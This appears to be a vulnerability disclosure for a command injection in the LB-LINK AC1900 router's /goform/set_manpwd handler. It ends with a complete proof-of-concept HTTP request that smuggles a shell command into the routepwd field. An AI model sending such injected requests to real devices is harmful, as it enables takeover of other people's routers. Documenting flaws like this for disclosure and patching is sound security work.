| Vendor | LBLINK |
|---|---|
| Product | AC1900 |
| Firmware Version | V1.0.2 |
https://www.b-link.net.cn/downloads_16.html
In the LB-LINK ac1900 router with the firmware version of V1.0.2, there is a command injection vulnerability in the route /goform/set_manpwd, which may lead to remote arbitrary code execution.
In the backend processing function sub_45EBF0 of the route /goform/set_manpwd, the parameter routepwd is retrieved from the HTTP message through the function websGetVar. After this parameter is serialized in JSON format, the library function bs_SetManPwd is used to modify the NVRAM variable Password. Subsequently, the modified Password is obtained through the function nvram_bufget, and a string is concatenated using sprintf and then passed into bl_do_system for command execution. An attacker can construct the routepwd parameter to achieve remote code execution.
At the same time, attackers can freely modify the administrator password through this interface.
POST /goform/set_manpwd HTTP/1.1
Host: 192.168.16.1
Content-Length: 42
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Origin: <http://192.168.16.1>
Referer: <http://192.168.16.1/admin/more.html>
Accept-Encoding: gzip, deflate, br
Cookie: platform=0; user=admin
Connection: keep-alive
routepwd=qwer1234;ping -c 1 192.168.16.100
